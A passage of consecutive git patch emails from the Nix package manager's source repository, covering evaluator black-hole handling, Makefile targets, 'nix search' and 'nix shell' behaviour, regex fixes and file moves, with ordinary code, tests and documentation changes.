v.isBlackhole() ? "a black hole" : "a thunk"; + case tApp: return "a function application"; default: return std::string(showType(v.type())); } @@ -1624,14 +1624,12 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & auto * fn = vCur.primOp; nrPrimOpCalls++; - // This will count black holes, but that's ok, because unrecoverable errors are rare. if (countCalls) primOpCalls[fn->name]++; try { fn->fun(*this, vCur.determinePos(noPos), args, vCur); } catch (Error & e) { - if (!fn->hideInDiagnostics) - addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); + addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); throw; } @@ -1670,7 +1668,6 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & auto fn = primOp->primOp; nrPrimOpCalls++; - // This will count black holes, but that's ok, because unrecoverable errors are rare. 
if (countCalls) primOpCalls[fn->name]++; try { @@ -1680,8 +1677,7 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & // so the debugger allows to inspect the wrong parameters passed to the builtin. fn->fun(*this, vCur.determinePos(noPos), vArgs, vCur); } catch (Error & e) { - if (!fn->hideInDiagnostics) - addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); + addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); throw; } @@ -2035,6 +2031,29 @@ void ExprPos::eval(EvalState & state, Env & env, Value & v) } +void ExprBlackHole::eval(EvalState & state, Env & env, Value & v) +{ + state.error("infinite recursion encountered") + .debugThrow(); +} + +// always force this to be separate, otherwise forceValue may inline it and take +// a massive perf hit +[[gnu::noinline]] +void EvalState::tryFixupBlackHolePos(Value & v, PosIdx pos) +{ + if (!v.isBlackhole()) + return; + auto e = std::current_exception(); + try { + std::rethrow_exception(e); + } catch (InfiniteRecursionError & e) { + e.err.errPos = positions[pos]; + } catch (...) { + } +} + + void EvalState::forceValueDeep(Value & v) { std::set seen; diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 4c7ea1d98..56bc5e48f 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -77,14 +77,6 @@ struct PrimOp */ std::optional experimentalFeature; - /** - * Whether to hide this primop in diagnostics. - * - * Used to hide the fact that black holes are primop applications from - * stack traces. - */ - bool hideInDiagnostics; - /** * Validity check to be performed by functions that introduce primops, * such as RegisterPrimOp() and Value::mkPrimOp(). @@ -473,6 +465,8 @@ public: */ inline void forceValue(Value & v, const PosIdx pos); + void tryFixupBlackHolePos(Value & v, PosIdx pos); + /** * Force a value, then recursively force list elements and * attributes. 
diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 22be8e68c..84860b30f 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -9,6 +9,8 @@ namespace nix { +ExprBlackHole eBlackHole; + struct PosAdapter : AbstractPos { Pos::Origin origin; diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index cf6fd1a8d..1e57fec7a 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -462,6 +462,16 @@ struct ExprPos : Expr COMMON_METHODS }; +/* only used to mark thunks as black holes. */ +struct ExprBlackHole : Expr +{ + void show(const SymbolTable & symbols, std::ostream & str) const override {} + void eval(EvalState & state, Env & env, Value & v) override; + void bindVars(EvalState & es, const std::shared_ptr & env) override {} +}; + +extern ExprBlackHole eBlackHole; + /* Static environments are used to map variable names onto (level, displacement) pairs used to obtain the value of the variable at diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index b7e903667..2a71747a0 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -4263,29 +4263,6 @@ static RegisterPrimOp primop_splitVersion({ }); -static void prim_blackHoleFn(EvalState & state, const PosIdx pos, Value * * args, Value & v) -{ - state.error("infinite recursion encountered") - .debugThrow(); -} - -static PrimOp primop_blackHole = { - .name = "«blackHole»", - .args = {}, - .fun = prim_blackHoleFn, - .hideInDiagnostics = true, -}; - -static Value makeBlackHole() -{ - Value v; - v.mkPrimOp(&primop_blackHole); - return v; -} - -Value prim_blackHole = makeBlackHole(); - - /************************************************************* * Primop registration *************************************************************/ diff --git a/src/libexpr/primops.hh b/src/libexpr/primops.hh index 244eada86..45486608f 100644 --- a/src/libexpr/primops.hh +++ b/src/libexpr/primops.hh @@ -51,10 +51,4 @@ void prim_importNative(EvalState & state, const PosIdx pos, 
Value * * args, Valu */ void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v); -/** - * Placeholder value for black holes, used to represent black holes as - * applications of this value to the evaluated thunks. - */ -extern Value prim_blackHole; - } diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index 52cd0f901..d9860e921 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -61,6 +61,7 @@ class Bindings; struct Env; struct Expr; struct ExprLambda; +struct ExprBlackHole; struct PrimOp; class Symbol; class PosIdx; @@ -442,16 +443,17 @@ public: }; -extern Value prim_blackHole; +extern ExprBlackHole eBlackHole; -inline bool Value::isBlackhole() const +bool Value::isBlackhole() const { - return internalType == tApp && app.left == &prim_blackHole; + return internalType == tThunk && thunk.expr == (Expr*) &eBlackHole; } -inline void Value::mkBlackhole() +void Value::mkBlackhole() { - mkApp(&prim_blackHole, &prim_blackHole); + internalType = tThunk; + thunk.expr = (Expr*) &eBlackHole; } From 26d60b837ca84856ceef18627b2354d26f002eb1 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 20 Dec 2023 03:23:49 -0500 Subject: [PATCH 157/654] Move down fallback targets in `Makefile` This ensures `lib.mk` still defines `default` as the first target. This fixes some builds. --- Makefile | 30 ++++++++++++++++++------------ 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/Makefile b/Makefile index c62216df8..1fdb6e897 100644 --- a/Makefile +++ b/Makefile @@ -32,11 +32,6 @@ makefiles += \ tests/unit/libstore-support/local.mk \ tests/unit/libexpr/local.mk \ tests/unit/libexpr-support/local.mk -else -.PHONY: check -check: - @echo "Unit tests are disabled. Configure without '--disable-unit-tests', or avoid calling 'make check'." 
- @exit 1 endif ifeq ($(ENABLE_FUNCTIONAL_TESTS), yes) @@ -46,11 +41,6 @@ makefiles += \ tests/functional/dyn-drv/local.mk \ tests/functional/test-libstoreconsumer/local.mk \ tests/functional/plugins/local.mk -else -.PHONY: installcheck -installcheck: - @echo "Functional tests are disabled. Configure without '--disable-functional-tests', or avoid calling 'make installcheck'." - @exit 1 endif OPTIMIZE = 1 @@ -64,9 +54,25 @@ endif include mk/lib.mk +# Must be included after `mk/lib.mk` so isn't the default target. +ifneq ($(ENABLE_UNIT_TESTS), yes) +.PHONY: check +check: + @echo "Unit tests are disabled. Configure without '--disable-unit-tests', or avoid calling 'make check'." + @exit 1 +endif + +ifneq ($(ENABLE_FUNCTIONAL_TESTS), yes) +.PHONY: installcheck +installcheck: + @echo "Functional tests are disabled. Configure without '--disable-functional-tests', or avoid calling 'make installcheck'." + @exit 1 +endif + # Must be included after `mk/lib.mk` so rules refer to variables defined # by the library. Rules are not "lazy" like variables, unfortunately. -ifeq ($(ENABLE_DOC_GEN),yes) + +ifeq ($(ENABLE_DOC_GEN), yes) $(eval $(call include-sub-makefile, doc/manual/local.mk)) else .PHONY: manual-html manpages @@ -75,7 +81,7 @@ manual-html manpages: @exit 1 endif -ifeq ($(ENABLE_INTERNAL_API_DOCS),yes) +ifeq ($(ENABLE_INTERNAL_API_DOCS), yes) $(eval $(call include-sub-makefile, doc/internal-api/local.mk)) else .PHONY: internal-api-html From ea454d8687b96376b221d7bdb1085968867c2496 Mon Sep 17 00:00:00 2001 From: Silvan Mosberger Date: Wed, 20 Dec 2023 03:24:38 +0100 Subject: [PATCH 158/654] Undeprecate isNull There's no good reason to deprecate it: - For consistency reasons it should continue to exist, such that all primitive types have a corresponding `builtins.is*` primop. - There's no implementation cost to continuing to have this function - It costs users time to try to migrate away from it, e.g. 
https://github.com/NixOS/nixpkgs/pull/219747 and https://github.com/NixOS/nixpkgs/pull/275548 - Using it can give easier-to-read code like `all isNull list` Co-authored-by: Robert Hensing --- src/libexpr/primops.cc | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 8b689f0c8..1ca4a2541 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -438,9 +438,7 @@ static RegisterPrimOp primop_isNull({ .doc = R"( Return `true` if *e* evaluates to `null`, and `false` otherwise. - > **Warning** - > - > This function is *deprecated*; just write `e == null` instead. + This is equivalent to `e == null`. )", .fun = prim_isNull, }); From e94a96893f074a949ba263d66d47e665040fed41 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Thu, 21 Dec 2023 10:00:14 +0100 Subject: [PATCH 159/654] =?UTF-8?q?maintainers:=20Mention=20the=20monthly?= =?UTF-8?q?=20=E2=80=9CAssigned=E2=80=9D=20column=20review?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit As decided during [the last team meeting](https://discourse.nixos.org/t/2023-12-18-nix-team-meeting-minutes-113/37050#improving-internal-and-external-communication-3), we want to regularly review the `Assigned` column in the team's board because it tends to turn into a graveyard of forgotten stuff. So encode that in the handbook --- maintainers/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/maintainers/README.md b/maintainers/README.md index ee97c1195..585e2b50a 100644 --- a/maintainers/README.md +++ b/maintainers/README.md @@ -43,7 +43,8 @@ The team meets twice a week: - Discussion meeting: [Fridays 13:00-14:00 CET](https://calendar.google.com/calendar/event?eid=MHNtOGVuNWtrZXNpZHR2bW1sM3QyN2ZjaGNfMjAyMjExMjVUMTIwMDAwWiBiOW81MmZvYnFqYWs4b3E4bGZraGczdDBxZ0Bn) 1. 
Triage issues and pull requests from the [No Status](#no-status) column (30 min) - 2. Discuss issues and pull requests from the [To discuss](#to-discuss) column (30 min) + 2. Discuss issues and pull requests from the [To discuss](#to-discuss) column (30 min). + Once a month, this slot is used to check the [Assigned](#assigned) column to make sure that nothing bitrots in it. - Work meeting: [Mondays 13:00-15:00 CET](https://calendar.google.com/calendar/event?eid=NTM1MG1wNGJnOGpmOTZhYms3bTB1bnY5cWxfMjAyMjExMjFUMTIwMDAwWiBiOW81MmZvYnFqYWs4b3E4bGZraGczdDBxZ0Bn) From d77a39a314871b9c9a0a4d09b153c40ea9c8aaca Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 21 Dec 2023 16:22:34 +0100 Subject: [PATCH 160/654] Fix indent --- src/libutil/url-name.cc | 45 +++++++++++++++++++++-------------------- src/libutil/url-name.hh | 2 +- 2 files changed, 24 insertions(+), 23 deletions(-) diff --git a/src/libutil/url-name.cc b/src/libutil/url-name.cc index f94383e32..7e51aa2e1 100644 --- a/src/libutil/url-name.cc +++ b/src/libutil/url-name.cc @@ -13,35 +13,36 @@ static const std::regex gitProviderRegex("github|gitlab|sourcehut"); static const std::regex gitSchemeRegex("git($|\\+.*)"); static const std::regex defaultOutputRegex(".*\\.default($|\\^.*)"); -std::optional getNameFromURL(ParsedURL url) { - std::smatch match; +std::optional getNameFromURL(const ParsedURL & url) +{ + std::smatch match; - /* If there is a dir= argument, use its value */ - if (url.query.count("dir") > 0) - return url.query.at("dir"); + /* If there is a dir= argument, use its value */ + if (url.query.count("dir") > 0) + return url.query.at("dir"); - /* If the fragment isn't a "default" and contains two attribute elements, use the last one */ - if (std::regex_match(url.fragment, match, lastAttributeRegex)) - return match.str(1); + /* If the fragment isn't a "default" and contains two attribute elements, use the last one */ + if (std::regex_match(url.fragment, match, lastAttributeRegex)) + return match.str(1); 
- /* If this is a github/gitlab/sourcehut flake, use the repo name */ - if (std::regex_match(url.scheme, gitProviderRegex) && std::regex_match(url.path, match, secondPathSegmentRegex)) - return match.str(1); + /* If this is a github/gitlab/sourcehut flake, use the repo name */ + if (std::regex_match(url.scheme, gitProviderRegex) && std::regex_match(url.path, match, secondPathSegmentRegex)) + return match.str(1); - /* If it is a regular git flake, use the directory name */ - if (std::regex_match(url.scheme, gitSchemeRegex) && std::regex_match(url.path, match, lastPathSegmentRegex)) - return match.str(1); + /* If it is a regular git flake, use the directory name */ + if (std::regex_match(url.scheme, gitSchemeRegex) && std::regex_match(url.path, match, lastPathSegmentRegex)) + return match.str(1); - /* If everything failed but there is a non-default fragment, use it in full */ - if (!url.fragment.empty() && !std::regex_match(url.fragment, defaultOutputRegex)) - return url.fragment; + /* If everything failed but there is a non-default fragment, use it in full */ + if (!url.fragment.empty() && !std::regex_match(url.fragment, defaultOutputRegex)) + return url.fragment; - /* If there is no fragment, take the last element of the path */ - if (std::regex_match(url.path, match, lastPathSegmentRegex)) - return match.str(1); + /* If there is no fragment, take the last element of the path */ + if (std::regex_match(url.path, match, lastPathSegmentRegex)) + return match.str(1); - /* If even that didn't work, the URL does not contain enough info to determine a useful name */ - return {}; + /* If even that didn't work, the URL does not contain enough info to determine a useful name */ + return {}; } } diff --git a/src/libutil/url-name.hh b/src/libutil/url-name.hh index 188b951e5..6f32754d2 100644 --- a/src/libutil/url-name.hh +++ b/src/libutil/url-name.hh @@ -15,6 +15,6 @@ namespace nix { * flake output, for example because it is empty or "default". 
* Otherwise returns the extracted name. */ -std::optional getNameFromURL(ParsedURL url); +std::optional getNameFromURL(const ParsedURL & url); } From 14508ade289b884ab2ceb0645a549a69fba82cab Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 21 Dec 2023 16:25:55 +0100 Subject: [PATCH 161/654] Typo --- src/nix/profile.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 98fa165e8..1d89815e2 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -119,7 +119,7 @@ struct ProfileManifest if (pathExists(manifestPath)) { auto json = nlohmann::json::parse(readFile(manifestPath)); - /* Keep track of alreay found names to allow preventing duplicates */ + /* Keep track of already found names to allow preventing duplicates. */ std::set foundNames; auto version = json.value("version", 0); From 942d635102810a310c747cee66d9e9f343e6b4c3 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 21 Dec 2023 16:33:53 +0100 Subject: [PATCH 162/654] Fix release notes --- doc/manual/rl-next/nix-profile-names.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/rl-next/nix-profile-names.md b/doc/manual/rl-next/nix-profile-names.md index 2f4a589a7..f5953bd72 100644 --- a/doc/manual/rl-next/nix-profile-names.md +++ b/doc/manual/rl-next/nix-profile-names.md @@ -1,5 +1,5 @@ --- -synopsis: nix profile: Allow referring to elements by human-readable name +synopsis: "`nix profile` now allows referring to elements by human-readable name" prs: 8678 --- From 5ed1884875cc6a6e9330b6c5a2f24c35e685f5a0 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Thu, 21 Dec 2023 10:14:54 -0800 Subject: [PATCH 163/654] libcmd: Installable::toStorePaths -> Installable::toStorePathSet --- src/libcmd/installables.cc | 4 ++-- src/libcmd/installables.hh | 2 +- src/nix/develop.cc | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc index 
6b3c82374..be9ebe9ca 100644 --- a/src/libcmd/installables.cc +++ b/src/libcmd/installables.cc @@ -715,7 +715,7 @@ BuiltPaths Installable::toBuiltPaths( } } -StorePathSet Installable::toStorePaths( +StorePathSet Installable::toStorePathSet( ref evalStore, ref store, Realise mode, OperateOn operateOn, @@ -735,7 +735,7 @@ StorePath Installable::toStorePath( Realise mode, OperateOn operateOn, ref installable) { - auto paths = toStorePaths(evalStore, store, mode, operateOn, {installable}); + auto paths = toStorePathSet(evalStore, store, mode, operateOn, {installable}); if (paths.size() != 1) throw Error("argument '%s' should evaluate to one store path", installable->what()); diff --git a/src/libcmd/installables.hh b/src/libcmd/installables.hh index e087f935c..c8ad41388 100644 --- a/src/libcmd/installables.hh +++ b/src/libcmd/installables.hh @@ -165,7 +165,7 @@ struct Installable const Installables & installables, BuildMode bMode = bmNormal); - static std::set toStorePaths( + static std::set toStorePathSet( ref evalStore, ref store, Realise mode, diff --git a/src/nix/develop.cc b/src/nix/develop.cc index 8db2de491..974020951 100644 --- a/src/nix/develop.cc +++ b/src/nix/develop.cc @@ -376,7 +376,7 @@ struct Common : InstallableCommand, MixProfile for (auto & [installable_, dir_] : redirects) { auto dir = absPath(dir_); auto installable = parseInstallable(store, installable_); - auto builtPaths = Installable::toStorePaths( + auto builtPaths = Installable::toStorePathSet( getEvalStore(), store, Realise::Nothing, OperateOn::Output, {installable}); for (auto & path: builtPaths) { auto from = store->printStorePath(path); @@ -631,7 +631,7 @@ struct CmdDevelop : Common, MixEnvironment bool found = false; - for (auto & path : Installable::toStorePaths(getEvalStore(), store, Realise::Outputs, OperateOn::Output, {bashInstallable})) { + for (auto & path : Installable::toStorePathSet(getEvalStore(), store, Realise::Outputs, OperateOn::Output, {bashInstallable})) { auto s = 
store->printStorePath(path) + "/bin/bash"; if (pathExists(s)) { shell = s; From 1fb43d1eee6f398686523c0bb80adb987c584c61 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Wed, 20 Dec 2023 10:25:22 -0800 Subject: [PATCH 164/654] tests: add a test for command line ordering --- tests/functional/shell-hello.nix | 16 ++++++++++++++++ tests/functional/shell.sh | 8 ++++++++ 2 files changed, 24 insertions(+) diff --git a/tests/functional/shell-hello.nix b/tests/functional/shell-hello.nix index 3fdd3501d..dfe66ef93 100644 --- a/tests/functional/shell-hello.nix +++ b/tests/functional/shell-hello.nix @@ -23,4 +23,20 @@ with import ./config.nix; chmod +x $dev/bin/hello2 ''; }; + + salve-mundi = mkDerivation { + name = "salve-mundi"; + outputs = [ "out" ]; + meta.outputsToInstall = [ "out" ]; + buildCommand = + '' + mkdir -p $out/bin + + cat > $out/bin/hello < Date: Mon, 18 Dec 2023 15:22:09 -0800 Subject: [PATCH 165/654] nix shell: reflect command line order in PATH order Prior to this change, Nix would prepend every installable to the PATH list in order to ensure that installables appeared before the current PATH from the ambient environment. With this change, all the installables are still prepended to the PATH, but in the same order as they appear on the command line. This means that the first of two packages that expose an executable `hello` would appear in the PATH first, and thus be executed first. See the test in the prior commit for a more concrete example. 
--- src/libcmd/installables.cc | 14 ++++++++++++++ src/libcmd/installables.hh | 7 +++++++ src/nix/run.cc | 9 ++++++--- 3 files changed, 27 insertions(+), 3 deletions(-) diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc index be9ebe9ca..736c41a1e 100644 --- a/src/libcmd/installables.cc +++ b/src/libcmd/installables.cc @@ -729,6 +729,20 @@ StorePathSet Installable::toStorePathSet( return outPaths; } +StorePaths Installable::toStorePaths( + ref evalStore, + ref store, + Realise mode, OperateOn operateOn, + const Installables & installables) +{ + StorePaths outPaths; + for (auto & path : toBuiltPaths(evalStore, store, mode, operateOn, installables)) { + auto thisOutPaths = path.outPaths(); + outPaths.insert(outPaths.end(), thisOutPaths.begin(), thisOutPaths.end()); + } + return outPaths; +} + StorePath Installable::toStorePath( ref evalStore, ref store, diff --git a/src/libcmd/installables.hh b/src/libcmd/installables.hh index c8ad41388..95e8841ca 100644 --- a/src/libcmd/installables.hh +++ b/src/libcmd/installables.hh @@ -172,6 +172,13 @@ struct Installable OperateOn operateOn, const Installables & installables); + static std::vector toStorePaths( + ref evalStore, + ref store, + Realise mode, + OperateOn operateOn, + const Installables & installables); + static StorePath toStorePath( ref evalStore, ref store, diff --git a/src/nix/run.cc b/src/nix/run.cc index efc0c56a1..9bca5b9d0 100644 --- a/src/nix/run.cc +++ b/src/nix/run.cc @@ -114,7 +114,7 @@ struct CmdShell : InstallablesCommand, MixEnvironment setEnviron(); - auto unixPath = tokenizeString(getEnv("PATH").value_or(""), ":"); + std::vector pathAdditions; while (!todo.empty()) { auto path = todo.front(); @@ -122,7 +122,7 @@ struct CmdShell : InstallablesCommand, MixEnvironment if (!done.insert(path).second) continue; if (true) - unixPath.push_front(store->printStorePath(path) + "/bin"); + pathAdditions.push_back(store->printStorePath(path) + "/bin"); auto propPath = 
CanonPath(store->printStorePath(path)) + "nix-support" + "propagated-user-env-packages"; if (auto st = accessor->maybeLstat(propPath); st && st->type == SourceAccessor::tRegular) { @@ -131,7 +131,10 @@ struct CmdShell : InstallablesCommand, MixEnvironment } } - setenv("PATH", concatStringsSep(":", unixPath).c_str(), 1); + auto unixPath = tokenizeString(getEnv("PATH").value_or(""), ":"); + unixPath.insert(unixPath.begin(), pathAdditions.begin(), pathAdditions.end()); + auto unixPathString = concatStringsSep(":", unixPath); + setenv("PATH", unixPathString.c_str(), 1); Strings args; for (auto & arg : command) args.push_back(arg); From 8c4ea12f11511519726737cc39bc5b4e089b9f33 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 21 Dec 2023 21:03:06 +0100 Subject: [PATCH 166/654] libutil/url-parts.hh: comment --- src/libutil/url-parts.hh | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libutil/url-parts.hh b/src/libutil/url-parts.hh index e968eea4b..a3b4f5b99 100644 --- a/src/libutil/url-parts.hh +++ b/src/libutil/url-parts.hh @@ -25,6 +25,7 @@ const static std::string pathRegex = "(?:" + segmentRegex + "(?:/" + segmentRege /// A Git ref (i.e. branch or tag name). /// \todo check that this is correct. +/// This regex incomplete. 
See https://git-scm.com/docs/git-check-ref-format const static std::string refRegexS = "[a-zA-Z0-9@][a-zA-Z0-9_.\\/@-+]*"; extern std::regex refRegex; From 397cf4e2859d5723f1e36aeb4b26ecae673515a8 Mon Sep 17 00:00:00 2001 From: Felix Uhl Date: Mon, 27 Nov 2023 23:09:32 +0100 Subject: [PATCH 167/654] nix search: Disallow empty regex Fixes #4739 Fixes #3553 in spirit IMO --- doc/manual/rl-next/empty-search-regex.md | 8 ++++++++ src/nix/search.cc | 6 ++---- src/nix/search.md | 15 ++++++++++----- tests/functional/search.sh | 17 ++++++++++------- 4 files changed, 30 insertions(+), 16 deletions(-) create mode 100644 doc/manual/rl-next/empty-search-regex.md diff --git a/doc/manual/rl-next/empty-search-regex.md b/doc/manual/rl-next/empty-search-regex.md new file mode 100644 index 000000000..b193f9456 --- /dev/null +++ b/doc/manual/rl-next/empty-search-regex.md @@ -0,0 +1,8 @@ +synopsis: Disallow empty search regex in `nix search` +prs: #9481 +description: { + +[`nix search`](@docroot@/command-ref/new-cli/nix3-search.md) now requires a search regex to be passed. To show all packages, use `^`. + +} + diff --git a/src/nix/search.cc b/src/nix/search.cc index ef0139e09..97ef1375e 100644 --- a/src/nix/search.cc +++ b/src/nix/search.cc @@ -67,11 +67,9 @@ struct CmdSearch : InstallableValueCommand, MixJSON settings.readOnlyMode = true; evalSettings.enableImportFromDerivation.setDefault(false); - // Empty search string should match all packages - // Use "^" here instead of ".*" due to differences in resulting highlighting - // (see #1893 -- libc++ claims empty search string is not in POSIX grammar) + // Recommend "^" here instead of ".*" due to differences in resulting highlighting if (res.empty()) - res.push_back("^"); + throw UsageError("Must provide at least one regex! 
To match all packages, use '%s'.", "nix search ^"); std::vector regexes; std::vector excludeRegexes; diff --git a/src/nix/search.md b/src/nix/search.md index 0c5d22549..f65ac9b17 100644 --- a/src/nix/search.md +++ b/src/nix/search.md @@ -5,7 +5,7 @@ R""( * Show all packages in the `nixpkgs` flake: ```console - # nix search nixpkgs + # nix search nixpkgs ^ * legacyPackages.x86_64-linux.AMB-plugins (0.8.1) A set of ambisonics ladspa plugins @@ -34,7 +34,7 @@ R""( * Show all packages in the flake in the current directory: ```console - # nix search + # nix search . ^ ``` * Search for Firefox or Chromium: @@ -64,11 +64,16 @@ R""( `nix search` searches [*installable*](./nix.md#installables) (which can be evaluated, that is, a flake or Nix expression, but not a store path or store derivation path) for packages whose name or description matches all of the -regular expressions *regex*. For each matching package, It prints the +regular expressions *regex*. For each matching package, It prints the full attribute name (from the root of the [installable](./nix.md#installables)), the version and the `meta.description` field, highlighting the substrings that -were matched by the regular expressions. If no regular expressions are -specified, all packages are shown. +were matched by the regular expressions. + +To show all packages, use the regular expression `^`. In contrast to `.*`, +it avoids highlighting the entire name and description of every package. + +> Note that in this context, `^` is the regex character to match the beginning of a string, *not* the delimiter for +> [selecting a derivation output](@docroot@/command-ref/new-cli/nix.md#derivation-output-selection). 
# Flake output attributes diff --git a/tests/functional/search.sh b/tests/functional/search.sh index 8742f8736..d9c7a75da 100644 --- a/tests/functional/search.sh +++ b/tests/functional/search.sh @@ -17,12 +17,15 @@ clearCache # Multiple arguments will not exist (( $(nix search -f search.nix '' hello broken | wc -l) == 0 )) +# No regex should return an error +(( $(nix search -f search.nix '' | wc -l) == 0 )) + ## Search expressions # Check that empty search string matches all -nix search -f search.nix '' |grepQuiet foo -nix search -f search.nix '' |grepQuiet bar -nix search -f search.nix '' |grepQuiet hello +nix search -f search.nix '' ^ | grepQuiet foo +nix search -f search.nix '' ^ | grepQuiet bar +nix search -f search.nix '' ^ | grepQuiet hello ## Tests for multiple regex/match highlighting @@ -39,8 +42,8 @@ e=$'\x1b' # grep doesn't support \e, \033 or even \x1b (( $(nix search -f search.nix '' 'b' | grep -Eo "$e\[32;1mb$e\[(0|0;1)m" | wc -l) == 3 )) ## Tests for --exclude -(( $(nix search -f search.nix -e hello | grep -c hello) == 0 )) +(( $(nix search -f search.nix ^ -e hello | grep -c hello) == 0 )) -(( $(nix search -f search.nix foo --exclude 'foo|bar' | grep -Ec 'foo|bar') == 0 )) -(( $(nix search -f search.nix foo -e foo --exclude bar | grep -Ec 'foo|bar') == 0 )) -[[ $(nix search -f search.nix -e bar --json | jq -c 'keys') == '["foo","hello"]' ]] +(( $(nix search -f search.nix foo ^ --exclude 'foo|bar' | grep -Ec 'foo|bar') == 0 )) +(( $(nix search -f search.nix foo ^ -e foo --exclude bar | grep -Ec 'foo|bar') == 0 )) +[[ $(nix search -f search.nix '' ^ -e bar --json | jq -c 'keys') == '["foo","hello"]' ]] From 4f47152209a81a2bef421467ca4bec00023eec04 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 21 Dec 2023 23:11:25 +0100 Subject: [PATCH 168/654] libutil/url-parts.hh: Fix regex Regex syntax is awful. 
--- src/libutil/url-parts.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libutil/url-parts.hh b/src/libutil/url-parts.hh index a3b4f5b99..4bb37ea9b 100644 --- a/src/libutil/url-parts.hh +++ b/src/libutil/url-parts.hh @@ -26,7 +26,7 @@ const static std::string pathRegex = "(?:" + segmentRegex + "(?:/" + segmentRege /// A Git ref (i.e. branch or tag name). /// \todo check that this is correct. /// This regex incomplete. See https://git-scm.com/docs/git-check-ref-format -const static std::string refRegexS = "[a-zA-Z0-9@][a-zA-Z0-9_.\\/@-+]*"; +const static std::string refRegexS = "[a-zA-Z0-9@][a-zA-Z0-9_.\\/@+-]*"; extern std::regex refRegex; /// Instead of defining what a good Git Ref is, we define what a bad Git Ref is From 26d7b0c793b389b71218fc38e613d3f75ad72299 Mon Sep 17 00:00:00 2001 From: Felix Uhl Date: Thu, 21 Dec 2023 22:45:21 +0100 Subject: [PATCH 169/654] Move url-name utility to libexpr/flake --- src/{libutil => libexpr/flake}/url-name.cc | 0 src/{libutil => libexpr/flake}/url-name.hh | 0 src/nix/profile.cc | 2 +- tests/unit/{libutil => libexpr/flake}/url-name.cc | 2 +- tests/unit/libexpr/local.mk | 3 ++- 5 files changed, 4 insertions(+), 3 deletions(-) rename src/{libutil => libexpr/flake}/url-name.cc (100%) rename src/{libutil => libexpr/flake}/url-name.hh (100%) rename tests/unit/{libutil => libexpr/flake}/url-name.cc (99%) diff --git a/src/libutil/url-name.cc b/src/libexpr/flake/url-name.cc similarity index 100% rename from src/libutil/url-name.cc rename to src/libexpr/flake/url-name.cc diff --git a/src/libutil/url-name.hh b/src/libexpr/flake/url-name.hh similarity index 100% rename from src/libutil/url-name.hh rename to src/libexpr/flake/url-name.hh diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 1d89815e2..abd56e4f4 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -11,7 +11,7 @@ #include "profiles.hh" #include "names.hh" #include "url.hh" -#include "url-name.hh" +#include "flake/url-name.hh" #include 
#include diff --git a/tests/unit/libutil/url-name.cc b/tests/unit/libexpr/flake/url-name.cc similarity index 99% rename from tests/unit/libutil/url-name.cc rename to tests/unit/libexpr/flake/url-name.cc index f637efa89..84d32837c 100644 --- a/tests/unit/libutil/url-name.cc +++ b/tests/unit/libexpr/flake/url-name.cc @@ -1,4 +1,4 @@ -#include "url-name.hh" +#include "flake/url-name.hh" #include namespace nix { diff --git a/tests/unit/libexpr/local.mk b/tests/unit/libexpr/local.mk index 5743880d7..25810ad9c 100644 --- a/tests/unit/libexpr/local.mk +++ b/tests/unit/libexpr/local.mk @@ -16,7 +16,8 @@ endif libexpr-tests_SOURCES := \ $(wildcard $(d)/*.cc) \ - $(wildcard $(d)/value/*.cc) + $(wildcard $(d)/value/*.cc) \ + $(wildcard $(d)/flake/*.cc) libexpr-tests_EXTRA_INCLUDES = \ -I tests/unit/libexpr-support \ From 4b4111866358b39d5bfc352fa58040c8a54a2759 Mon Sep 17 00:00:00 2001 From: Felix Uhl Date: Fri, 22 Dec 2023 09:38:13 +0100 Subject: [PATCH 170/654] Move flakeref tests to new flake/ subdirectory --- tests/unit/libexpr/{ => flake}/flakeref.cc | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename tests/unit/libexpr/{ => flake}/flakeref.cc 